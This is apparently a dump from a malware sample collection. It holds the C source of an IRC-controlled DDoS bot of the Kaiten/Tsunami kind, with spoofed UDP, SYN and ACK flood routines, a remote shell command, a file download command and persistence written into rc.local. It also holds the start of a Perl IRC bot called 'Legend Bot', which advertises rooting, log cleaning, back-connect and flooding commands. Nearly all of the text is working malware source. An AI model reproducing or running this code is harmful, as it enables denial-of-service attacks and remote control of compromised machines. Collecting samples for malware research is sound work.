267 |                 Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender);
268 |                 return;
269 |         }
270 |         Send(sock,"NICK %s\n",argv[1]);
271 | }
272 | void disable(int sock, char *sender, int argc, char **argv) {
273 |         if (argc != 1) {
274 |                 Send(sock,"NOTICE %s :DISABLE <pass>\n",sender);
275 |                 Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
276 |                 return;
277 |         }
278 | 	if (disabled) {
279 | 		Send(sock,"NOTICE %s :Already disabled.\n",sender);
280 | 		return;
281 | 	}
282 | 	if (strlen(argv[1]) > 254) {
283 |                 Send(sock,"NOTICE %s :Password too long! > 254\n",sender);
284 |                 return;
285 | 	}
286 |         disabled=1;
287 | 	memset(dispass,0,256);
288 | 	strcpy(dispass,argv[1]);
289 | 	Send(sock,"NOTICE %s :Disable sucessful.\n");
290 | }
291 | void enable(int sock, char *sender, int argc, char **argv) {
292 |         if (argc != 1) {
293 |                 Send(sock,"NOTICE %s :ENABLE <pass>\n",sender);
294 |                 Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
295 |                 return;
296 |         }
297 | 	if (!disabled) {
298 | 		Send(sock,"NOTICE %s :Already enabled.\n",sender);
299 | 		return;
300 | 	}
301 | 	if (strcasecmp(dispass,argv[1])) {
302 | 		Send(sock,"NOTICE %s :Wrong password\n",sender);
303 | 		return;
304 | 	}
305 |         disabled=0;
306 | 	Send(sock,"NOTICE %s :Password correct.\n",sender);
307 | }
308 | void spoof(int sock, char *sender, int argc, char **argv) {
309 |         char ip[256];
310 |         int i, num;
311 |         unsigned long uip;
312 |         if (argc != 1) {
313 |                 Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
314 |                 spoofs=0;
315 |                 spoofsm=0;
316 |                 return;
317 |         }
318 |         if (strlen(argv[1]) > 16) {
319 |                 Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
320 |                 return;
321 |         }
322 |         strcpy(ip,argv[1]);
323 |         if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
324 |         for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
325 |         num=-(num-4);
326 |         for (i=0;i<num;i++) strcat(ip,".0");
327 |         uip=inet_network(ip);
328 |         if (num == 0) spoofsm=1;
329 |         else spoofsm=pow(256,num);
330 |         spoofs=uip;
331 | }
332 | struct iphdr {
333 |         unsigned int ihl:4, version:4;
334 |         unsigned char tos;
335 |         unsigned short tot_len;
336 |         unsigned short id;
337 |         unsigned short frag_off;
338 |         unsigned char ttl;
339 |         unsigned char protocol;
340 |         unsigned short check;
341 |         unsigned long saddr;
342 |         unsigned long daddr;
343 | };
344 | struct udphdr {
345 |         unsigned short source;
346 |         unsigned short dest;
347 |         unsigned short len;
348 |         unsigned short check;
349 | };
350 | struct tcphdr {
351 |         unsigned short source;
352 |         unsigned short dest;
353 |         unsigned long seq;
354 |         unsigned long ack_seq;
355 |         unsigned short res1:4, doff:4;
356 | 	unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
357 |         unsigned short window;
358 |         unsigned short check;
359 |         unsigned short urg_ptr;
360 | };
361 | struct send_tcp {
362 | 	struct iphdr ip;
363 | 	struct tcphdr tcp;
364 | 	char buf[20];
365 | };
366 | struct pseudo_header {
367 | 	unsigned int source_address;
368 | 	unsigned int dest_address;
369 | 	unsigned char placeholder;
370 | 	unsigned char protocol;
371 | 	unsigned short tcp_length;
372 | 	struct tcphdr tcp;
373 | 	char buf[20];
374 | };
375 | unsigned int host2ip(char *sender,char *hostname) {
376 |         static struct in_addr i;
377 |         struct hostent *h;
378 |         if((i.s_addr = inet_addr(hostname)) == -1) {
379 |                 if((h = gethostbyname(hostname)) == NULL) {
380 |                         Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
381 |                         exit(0);
382 |                 }
383 |                 bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
384 |         }
385 |         return i.s_addr;
386 | }
387 | void udp(int sock, char *sender, int argc, char **argv) {
388 |         unsigned int port,i=0;
389 |         unsigned long psize,target,secs;
390 |         struct sockaddr_in s_in;
391 |         struct iphdr *ip;
392 | 	struct udphdr *udp;
393 | 	char buf[1500],*str;
394 |         int get;
395 |         time_t start=time(NULL);
396 |         if (mfork(sender) != 0) return;
397 |         if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
398 |         if (argc < 3) {
399 |                 Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
400 |                 exit(1);
401 |         }
402 |         target = host2ip(sender,argv[1]);
403 |         port = atoi(argv[2]);
404 |         secs = atol(argv[3]);
405 |         ip=(void*)buf;
406 | 	udp=(void*)(buf+sizeof(struct iphdr));
407 |         str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
408 |         memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
409 |         Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]);
410 |         ip->ihl = 5;
411 |         ip->version = 4;
412 |         ip->tos = 0;
413 |         ip->tot_len = 1500;
414 |         ip->frag_off = 0;
415 |         ip->protocol = 17;
416 |         ip->ttl = 64;
417 |         ip->daddr = target;
418 |         udp->len = htons(psize);
419 |         s_in.sin_family  = AF_INET;
420 |         s_in.sin_addr.s_addr = target;
421 |         for (;;) {
422 |                 udp->source = rand();
423 |                 if (port) udp->dest = htons(port);
424 |                 else udp->dest = rand();
425 |                 udp->check = in_cksum((u_short *)buf,1500);
426 |                 ip->saddr = getspoof();
427 |                 ip->id = rand();
428 |                 ip->check = in_cksum((u_short *)buf,1500);
429 |                 s_in.sin_port = udp->dest;
430 |                 sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
431 |                 if (i >= 50) {
432 |                         if (time(NULL) >= start+secs) exit(0);
433 |                         i=0;
434 |                 }
435 |                 i++;
436 |         }
437 | }
438 | void pan(int sock, char *sender, int argc, char **argv) {
439 |         struct send_tcp send_tcp;
440 |         struct pseudo_header pseudo_header;
441 |         struct sockaddr_in sin;
442 |         unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
443 |         unsigned int psize=20, source, dest, check;
444 |         unsigned long saddr, daddr,secs;
445 |         int get;
446 |         time_t start=time(NULL);
447 |         if (mfork(sender) != 0) return;
448 |         if (argc < 3) {
449 |                 Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
450 |                 exit(1);
451 |         }
452 |         if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
453 |         {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
454 |         daddr=host2ip(sender,argv[1]);
455 |         secs=atol(argv[3]);
456 |         Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
457 |         send_tcp.ip.ihl = 5;
458 |         send_tcp.ip.version = 4;
459 |         send_tcp.ip.tos = 16;
460 |         send_tcp.ip.frag_off = 64;
461 |         send_tcp.ip.ttl = 64;
462 |         send_tcp.ip.protocol = 6;
463 |         send_tcp.tcp.ack_seq = 0;
464 |         send_tcp.tcp.doff = 10;
465 |         send_tcp.tcp.res1 = 0;
466 |         send_tcp.tcp.cwr = 0;
467 |         send_tcp.tcp.ece = 0;
468 |         send_tcp.tcp.urg = 0;
469 |         send_tcp.tcp.ack = 0;
470 |         send_tcp.tcp.psh = 0;
471 |         send_tcp.tcp.rst = 0;
472 |         send_tcp.tcp.fin = 0;
473 |         send_tcp.tcp.syn = 1;
474 |         send_tcp.tcp.window = 30845;
475 |         send_tcp.tcp.urg_ptr = 0;
476 |         dest=htons(atoi(argv[2]));
477 |         while(1) {
478 |                 source=rand();
479 |                 if (atoi(argv[2]) == 0) dest=rand();
480 |                 saddr=getspoof();
481 |                 send_tcp.ip.tot_len = htons(40+psize);
482 |                 send_tcp.ip.id = rand();
483 |                 send_tcp.ip.saddr = saddr;
484 |                 send_tcp.ip.daddr = daddr;
485 |                 send_tcp.ip.check = 0;
486 |                 send_tcp.tcp.source = source;
487 |                 send_tcp.tcp.dest = dest;
488 |                 send_tcp.tcp.seq = rand();
489 |                 send_tcp.tcp.check = 0;
490 |                 sin.sin_family = AF_INET;
491 |                 sin.sin_port = dest;
492 |                 sin.sin_addr.s_addr = send_tcp.ip.daddr;
493 |                 send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
494 |                 check = rand();
495 |                 send_tcp.buf[9]=((char*)&check)[0];
496 |                 send_tcp.buf[10]=((char*)&check)[1];
497 |                 send_tcp.buf[11]=((char*)&check)[2];
498 |                 send_tcp.buf[12]=((char*)&check)[3];
499 |                 pseudo_header.source_address = send_tcp.ip.saddr;
500 |                 pseudo_header.dest_address = send_tcp.ip.daddr;
501 |                 pseudo_header.placeholder = 0;
502 |                 pseudo_header.protocol = IPPROTO_TCP;
503 |                 pseudo_header.tcp_length = htons(20+psize);
504 |                 bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
505 |                 bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
506 |                 send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
507 |                 sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
508 |                 if (a >= 50) {
509 |                         if (time(NULL) >= start+secs) exit(0);
510 |                         a=0;
511 |                 }
512 |                 a++;
513 |         }
514 |         close(get);
515 |         exit(0);
516 | }
517 | void tsunami(int sock, char *sender, int argc, char **argv) {
518 |         struct send_tcp send_tcp;
519 |         struct pseudo_header pseudo_header;
520 |         struct sockaddr_in sin;
521 |         unsigned int psize=1400, check,i;
522 |         unsigned long saddr, daddr,secs;
523 |         int get;
524 |         time_t start=time(NULL);
525 |         if (mfork(sender) != 0) return;
526 |         if (argc < 2) {
527 |                 Send(sock,"NOTICE %s :TSUNAMI <target> <secs>\n",sender);
528 |                 exit(1);
529 |         }
530 |         secs=atol(argv[2]);
531 |         if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
532 |         srand(time(NULL) ^ getpid());
533 |         memset(send_tcp.buf,rand(),psize);
534 |         daddr=host2ip(sender,argv[1]);
535 |         Send(sock,"NOTICE %s :Tsunami heading for %s.\n",sender,argv[1]);
536 |         while(1) {
537 |                 saddr=getspoof();
538 |                 send_tcp.ip.ihl = 5;
539 |                 send_tcp.ip.version = 4;
540 |                 send_tcp.ip.tos = 16;
541 |                 send_tcp.ip.tot_len = htons(40+psize);
542 |                 send_tcp.ip.id = rand();
543 |                 send_tcp.ip.frag_off = 64;
544 |                 send_tcp.ip.ttl = 64;
545 |                 send_tcp.ip.protocol = 6;
546 |                 send_tcp.ip.check = 0;
547 |                 send_tcp.ip.saddr = saddr;
548 |                 send_tcp.ip.daddr = daddr;
549 |                 send_tcp.tcp.source = rand();
550 |                 send_tcp.tcp.dest = rand();
551 |                 send_tcp.tcp.seq = rand();
552 |                 send_tcp.tcp.ack_seq = rand();
553 |                 send_tcp.tcp.doff = 5;
554 |                 send_tcp.tcp.res1 = 0;
555 |                 send_tcp.tcp.cwr = 0;
556 |                 send_tcp.tcp.ece = 0;
557 |                 send_tcp.tcp.urg = 0;
558 |                 send_tcp.tcp.ack = 1;
559 |                 send_tcp.tcp.psh = 1;
560 |                 send_tcp.tcp.rst = 0;
561 |                 send_tcp.tcp.fin = 0;
562 |                 send_tcp.tcp.syn = 0;
563 |                 send_tcp.tcp.window = 30845;
564 |                 send_tcp.tcp.check = 0;
565 |                 send_tcp.tcp.urg_ptr = 0;
566 |                 sin.sin_family = AF_INET;
567 |                 sin.sin_port = send_tcp.tcp.dest;
568 |                 sin.sin_addr.s_addr = send_tcp.ip.daddr;
569 |                 send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
570 |                 check = in_cksum((unsigned short *)&send_tcp, 40);
571 |                 pseudo_header.source_address = send_tcp.ip.saddr;
572 |                 pseudo_header.dest_address = send_tcp.ip.daddr;
573 |                 pseudo_header.placeholder = 0;
574 |                 pseudo_header.protocol = IPPROTO_TCP;
575 |                 pseudo_header.tcp_length = htons(20+psize);
576 |                 bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
577 |                 bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
578 |                 send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
579 |                 sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
580 |                 if (i >= 50) {
581 |                         if (time(NULL) >= start+secs) break;
582 |                         i=0;
583 |                 }
584 |                 i++;
585 |         }
586 |         close(get);
587 |         exit(0);
588 | }
589 | void unknown(int sock, char *sender, int argc, char **argv) {
590 | 	int flag=1,fd,i;
591 | 	unsigned long secs;
592 | 	char *buf=(char*)malloc(9216);
593 |  	struct hostent *hp;
594 | 	struct sockaddr_in in;
595 |         time_t start=time(NULL);
596 |         if (mfork(sender) != 0) return;
597 |         if (argc < 2) {
598 |                 Send(sock,"NOTICE %s :UNKNOWN <target> <secs>\n",sender);
599 |                 exit(1);
600 |         }
601 |         secs=atol(argv[2]);
602 | 	memset((void*)&in,0,sizeof(struct sockaddr_in));
603 | 	in.sin_addr.s_addr=host2ip(sender,argv[1]);
604 | 	in.sin_family = AF_INET;
605 |         Send(sock,"NOTICE %s :Unknowning %s.\n",sender,argv[1]);
606 | 	while(1) {
607 | 		in.sin_port = rand();
608 | 		if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
609 | 		else {
610 | 			flag=1;
611 | 			ioctl(fd,FIONBIO,&flag);
612 | 			sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
613 | 			close(fd);
614 | 		}
615 |                 if (i >= 50) {
616 |                         if (time(NULL) >= start+secs) break;
617 |                         i=0;
618 |                 }
619 |                 i++;
620 | 	}
621 |         close(fd);
622 | 	exit(0);
623 | }
624 | void move(int sock, char *sender, int argc, char **argv) {
625 |         if (argc < 1) {
626 |                 Send(sock,"NOTICE %s :MOVE <server>\n",sender);
627 |                 exit(1);
628 |         }
629 | 	server=strdup(argv[1]);
630 | 	changeservers=1;
631 | 	close(sock);
632 | }
633 | void help(int sock, char *sender, int argc, char **argv) {
634 |         if (mfork(sender) != 0) return;
635 |         Send(sock,"NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls\n",sender); sleep(2);
636 |         Send(sock,"NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers\n",sender); sleep(2);
637 |         Send(sock,"NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder\n",sender); sleep(2);
638 |         Send(sock,"NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder\n",sender); sleep(2);
639 | 
640 |         Send(sock,"NOTICE %s :NICK <nick>                                      = Changes the nick of the client\n",sender); sleep(2);
641 | 	Send(sock,"NOTICE %s :SERVER <server>                                  = Changes servers\n",sender); sleep(2);
642 |         Send(sock,"NOTICE %s :GETSPOOFS                                        = Gets the current spoofing\n",sender); sleep(2);
643 |         Send(sock,"NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet\n",sender); sleep(2);
644 | 
645 |         Send(sock,"NOTICE %s :DISABLE                                          = Disables all packeting from this client\n",sender); sleep(2);
646 |         Send(sock,"NOTICE %s :ENABLE                                           = Enables all packeting from this client\n",sender); sleep(2);
647 | 
648 |         Send(sock,"NOTICE %s :KILL                                             = Kills the client\n",sender); sleep(2);
649 | 	Send(sock,"NOTICE %s :GET <http address> <save as>                     = Downloads a file off the web and saves it onto the hd\n",sender); sleep(2);
650 |         Send(sock,"NOTICE %s :VERSION                                          = Requests version of client\n",sender); sleep(2);
651 |         Send(sock,"NOTICE %s :KILLALL                                          = Kills all current packeting\n",sender); sleep(2);
652 |         Send(sock,"NOTICE %s :HELP                                             = Displays this\n",sender);
653 | 
654 | 	Send(sock,"NOTICE %s :IRC <command>                                    = Sends this command to the server\n",sender); sleep(2);
655 | 	Send(sock,"NOTICE %s :SH <command>                                     = Executes a command\n",sender); sleep(2);
656 |         exit(0);
657 | }
658 | void killall(int sock, char *sender, int argc, char **argv) {
659 |         unsigned long i;
660 |         for (i=0;i<numpids;i++) {
661 |                 if (pids[i] != 0 && pids[i] != getpid()) {
662 |                         if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]);
663 |                         kill(pids[i],9);
664 |                 }
665 |         }
666 | }
667 | void killd(int sock, char *sender, int argc, char **argv) {
668 | 	if (!disable) kill(0,9);
669 | 	else Send(sock,"NOTICE %s :Unable to comply.\n");
670 | }
671 | struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
672 | 	{ "TSUNAMI", tsunami },
673 |         { "PAN", pan },
674 |         { "UDP", udp },
675 | 	{ "UNKNOWN", unknown },
676 | 
677 |         { "NICK", nickc },
678 |         { "SERVER", move },
679 | 	{ "GETSPOOFS", getspoofs },
680 |         { "SPOOFS", spoof },
681 | 
682 | 	{ "DISABLE", disable },
683 |         { "ENABLE", enable },
684 | 
685 |         { "KILL", killd },
686 | 	{ "GET", get },
687 |         { "VERSION", version },
688 |         { "KILLALL", killall },
689 |         { "HELP", help },
690 | { (char *)0, (void (*)(int,char *,int,char **))0 } };
691 | void _PRIVMSG(int sock, char *sender, char *str) {
692 |         int i;
693 |         char *to, *message;
694 |         for (i=0;i<strlen(str) && str[i] != ' ';i++);
695 |         str[i]=0;
696 |         to=str;
697 |         message=str+i+2;
698 |         for (i=0;i<strlen(sender) && sender[i] != '!';i++);
699 |         sender[i]=0;
700 |         if (*message == '!' && !strcasecmp(to,chan)) {
701 |                 char *params[12], name[1024]={0};
702 |                 int num_params=0, m;
703 |                 message++;
704 |                 for (i=0;i<strlen(message) && message[i] != ' ';i++);
705 |                 message[i]=0;
706 |                 if (strwildmatch(message,nick)) return;
707 |                 message+=i+1;
708 |                 if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4);
709 |                 if (!strncmp(message,"SH ",3)) {
710 |                         char buf[1024];
711 |                         FILE *command;
712 |                         if (mfork(sender) != 0) return;
713 |                         memset(buf,0,1024);
714 |                         sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
715 |                         command=popen(buf,"r");
716 |                         while(!feof(command)) {
717 |                                 memset(buf,0,1024);
718 |                                 fgets(buf,1024,command);
719 |                                 Send(sock,"NOTICE %s :%s\n",sender,buf);
720 |                                 sleep(1);
721 |                         }
722 |                         pclose(command);
723 |                         exit(0);
724 |                 }
725 |                 m=strlen(message);
726 |                 for (i=0;i<m;i++) {
727 |                         if (*message == ' ' || *message == 0) break;
728 |                         name[i]=*message;
729 |                         message++;
730 |                 }
731 |                 for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
732 |                 num_params++;
733 |                 if (num_params > 10) num_params=10;
734 |                 params[0]=name;
735 |                 params[num_params+1]="\0";
736 |                 m=1;
737 |                 while (*message != 0) {
738 |                         message++;
739 |                         if (m >= num_params) break;
740 |                         for (i=0;i<strlen(message) && message[i] != ' ';i++);
741 |                         params[m]=(char*)malloc(i+1);
742 |                         strncpy(params[m],message,i);
743 |                         params[m][i]=0;
744 |                         m++;
745 |                         message+=i;
746 |                 }
747 |                 for (m=0; flooders[m].cmd != (char *)0; m++) {
748 |                         if (!strcasecmp(flooders[m].cmd,name)) {
749 |                                 flooders[m].func(sock,sender,num_params-1,params);
750 |                                 for (i=1;i<num_params;i++) free(params[i]);
751 |                                 return;
752 |                         }
753 |                 }
754 |         }
755 | }
756 | void _376(int sock, char *sender, char *str) {
757 |         Send(sock,"MODE %s -xi\n",nick);
758 |         Send(sock,"JOIN %s :%s\n",chan,key);
759 |         Send(sock,"WHO %s\n",nick);
760 | }
761 | void _PING(int sock, char *sender, char *str) {
762 |         Send(sock,"PONG %s\n",str);
763 | }
764 | void _352(int sock, char *sender, char *str) {
765 |         int i,d;
766 |         char *msg=str;
767 |         struct hostent *hostm;
768 |         unsigned long m;
769 |         for (i=0,d=0;d<5;d++) {
770 |                 for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
771 |                 if (i == strlen(str)) return;
772 |         }
773 |         for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
774 |         msg[i]=0;
775 |         if (!strcasecmp(msg,nick) && !spoofsm) {
776 |                 msg=str;
777 |                 for (i=0,d=0;d<3;d++) {
778 |                         for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
779 |                         if (i == strlen(str)) return;
780 |                 }
781 |                 for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
782 |                 msg[i]=0;
783 |                 if ((m = inet_addr(msg)) == -1) {
784 |                         if ((hostm=gethostbyname(msg)) == NULL) {
785 |                                 Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
786 |                                 return;
787 |                         }
788 |                         memcpy((char*)&m, hostm->h_addr, hostm->h_length);
789 |                 }
790 |                 ((char*)&spoofs)[3]=((char*)&m)[0];
791 |                 ((char*)&spoofs)[2]=((char*)&m)[1];
792 |                 ((char*)&spoofs)[1]=((char*)&m)[2];
793 |                 ((char*)&spoofs)[0]=0;
794 |                 spoofsm=256;
795 |         }
796 | }
797 | void _433(int sock, char *sender, char *str) {
798 |         free(nick);
799 |         nick=makestring();
800 | }
801 | void _NICK(int sock, char *sender, char *str) {
802 | 	int i;
803 |         for (i=0;i<strlen(sender) && sender[i] != '!';i++);
804 |         sender[i]=0;
805 | 	if (!strcasecmp(sender,nick)) {
806 | 		if (*str == ':') str++;
807 | 		if (nick) free(nick);
808 | 		nick=strdup(str);
809 | 	}
810 | }
811 | struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
812 |         { "352", _352 },
813 |         { "376", _376 },
814 |         { "433", _433 },
815 |         { "422", _376 },
816 |         { "PRIVMSG", _PRIVMSG },
817 |         { "PING", _PING },
818 | 	{ "NICK", _NICK },
819 | { (char *)0, (void (*)(int,char *,char *))0 } };
820 | void con() {
821 |         struct sockaddr_in srv;
822 |         unsigned long ipaddr,start;
823 |         int flag;
824 |         struct hostent *hp;
825 | start:
826 | 	sock=-1;
827 | 	flag=1;
828 | 	if (changeservers == 0) server=servers[rand()%numservers];
829 | 	changeservers=0;
830 |         while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
831 | 	if (inet_addr(server) == 0 || inet_addr(server) == -1) {
832 | 		if ((hp = gethostbyname(server)) == NULL) {
833 | 			server=NULL;
834 | 			close(sock);
835 | 			goto start;
836 | 		}
837 | 		bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
838 | 	}
839 | 	else srv.sin_addr.s_addr=inet_addr(server);
840 |         srv.sin_family = AF_INET;
841 |         srv.sin_port = htons(6667);
842 | 	ioctl(sock,FIONBIO,&flag);
843 | 	start=time(NULL);
844 | 	while(time(NULL)-start < 10) {
845 | 		errno=0;
846 | 		if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
847 | 		        setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
848 | 		        setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
849 | 		        setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
850 | 			return;
851 | 		}
852 | 		if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
853 | 		sleep(1);
854 | 	}
855 | 	server=NULL;
856 | 	close(sock);
857 | 	goto start;
858 | }
859 | int main(int argc, char **argv) {
860 |         int on,i;
861 |         char cwd[256],*str;
862 |         FILE *file;
863 | #ifdef STARTUP
864 | 	str="/etc/rc.d/rc.local";
865 | 	file=fopen(str,"r");
866 | 	if (file == NULL) {
867 | 		str="/etc/rc.conf";
868 | 		file=fopen(str,"r");
869 | 	}
870 |         if (file != NULL) {
871 |                 char outfile[256], buf[1024];
872 |                 int i=strlen(argv[0]), d=0;
873 |                 getcwd(cwd,256);
874 |                 if (strcmp(cwd,"/")) {
875 |                         while(argv[0][i] != '/') i--;
876 |                         sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
877 |                         while(!feof(file)) {
878 |                                 fgets(buf,1024,file);
879 |                                 if (!strcasecmp(buf,outfile)) d++;
880 |                         }
881 |                         if (d == 0) {
882 |                                 FILE *out;
883 |                                 fclose(file);
884 |                                 out=fopen(str,"a");
885 |                                 if (out != NULL) {
886 |                                         fputs(outfile,out);
887 |                                         fclose(out);
888 |                                 }
889 |                         }
890 |                         else fclose(file);
891 |                 }
892 |                 else fclose(file);
893 |         }
894 | #endif
895 |         if (fork()) exit(0);
896 | #ifdef FAKENAME
897 | 	strncpy(argv[0],FAKENAME,strlen(argv[0]));
898 |         for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
899 | #endif
900 |         srand((time(NULL) ^ getpid()) + getppid());
901 |         nick=makestring();
902 |         ident=makestring();
903 |         user=makestring();
904 |         chan=CHAN;
905 | 	key=KEY;
906 | 	server=NULL;
907 | sa:
908 | #ifdef IDENT
909 |         for (i=0;i<numpids;i++) {
910 |                 if (pids[i] != 0 && pids[i] != getpid()) {
911 |                         kill(pids[i],9);
912 | 			waitpid(pids[i],NULL,WNOHANG);
913 |                 }
914 |         }
915 | 	pids=NULL;
916 | 	numpids=0;
917 | 	identd();
918 | #endif
919 | 	con();
920 |         Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
921 |         while(1) {
922 |                 unsigned long i;
923 |                 fd_set n;
924 |                 struct timeval tv;
925 |                 FD_ZERO(&n);
926 |                 FD_SET(sock,&n);
927 |                 tv.tv_sec=60*20;
928 |                 tv.tv_usec=0;
929 |                 if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
930 |                 for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
931 |                         unsigned int *newpids,on;
932 |                         for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
933 | 			pids[on-1]=0;
934 |                         numpids--;
935 |                         newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
936 |                         for (on=0;on<numpids;on++) newpids[on]=pids[on];
937 |                         free(pids);
938 |                         pids=newpids;
939 |                 }
940 |                 if (FD_ISSET(sock,&n)) {
941 |                         char buf[4096], *str;
942 |                         int i;
943 |                         if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
944 |                         buf[i]=0;
945 |                         str=strtok(buf,"\n");
946 |                         while(str && *str) {
947 |                                 char name[1024], sender[1024];
948 |                                 filter(str);
949 |                                 if (*str == ':') {
950 |                                         for (i=0;i<strlen(str) && str[i] != ' ';i++);
951 |                                         str[i]=0;
952 |                                         strcpy(sender,str+1);
953 |                                         strcpy(str,str+i+1);
954 |                                 }
955 |                                 else strcpy(sender,"*");
956 |                                 for (i=0;i<strlen(str) && str[i] != ' ';i++);
957 |                                 str[i]=0;
958 |                                 strcpy(name,str);
959 |                                 strcpy(str,str+i+1);
960 |                                 for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
961 |                                 if (!strcasecmp(name,"ERROR")) goto sa;
962 |                                 str=strtok((char*)NULL,"\n");
963 |                         }
964 |                 }
965 |         }
966 |         return 0;
967 | }
968 | 


--------------------------------------------------------------------------------
/malicious_samples/legend.txt:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/perl
   2 | ###########################################################
   3 | #-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--#
   4 | ###########################################################
   5 | # Legend Bot [2011] DO NOT FUCKIN SHARE!		  #
   6 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
   7 | # Commands:						  #
   8 | # !legend @system					  #
   9 | # !legend @rootable					  #
  10 | # !legend @cleanlogs					  #
  11 | # !legend @socks5					  #
  12 | # !legend @nmap <ip> <beginport> <endport>		  #
  13 | # !legend @back <ip><port>				  #
  14 | # !legend @sqlflood <host> <time>			  #
  15 | # !legend @udp <host> <packet size> <time>		  #
  16 | # !legend @udp2 <host> <packet size> <time> <port> 	  #
  17 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
  18 | ###########################################################
  19 | ###########################################################
  20 | 
  21 | ####################[Configuration]########################
  22 | ###########################################################
  23 | my $sshuser = $argv[0];
  24 | my $sshpass = $argv[1];
  25 | my $sshhost = $argv[2];
  26 | my $hidden = 'core';
  27 | my $linas_max='4';
  28 | my $sleep='5';
  29 | my @admins=("msf_user");
  30 | my @hostauth=("legend.rocks");
  31 | my @channels=("#lol");
  32 | my $nick= 'Apache';
  33 | my $ircname = 'Zax';
  34 | my $realname = '$uname';
  35 | my $server='192.168.93.137';
  36 | my $port='6667';
  37 | ###########################################################
  38 | ####################[Configuration]########################
  39 | ###########################################################
  40 | ####################[lets start..]#########################
  41 | ###########################################################
  42 | $SIG{'INT'} = 'IGNORE';
  43 | $SIG{'HUP'} = 'IGNORE';
  44 | $SIG{'TERM'} = 'IGNORE';
  45 | $SIG{'CHLD'} = 'IGNORE';
  46 | $SIG{'PS'} = 'IGNORE';
  47 | use IO::Socket;
  48 | use Socket;
  49 | use IO::Select;
  50 | chdir("/");
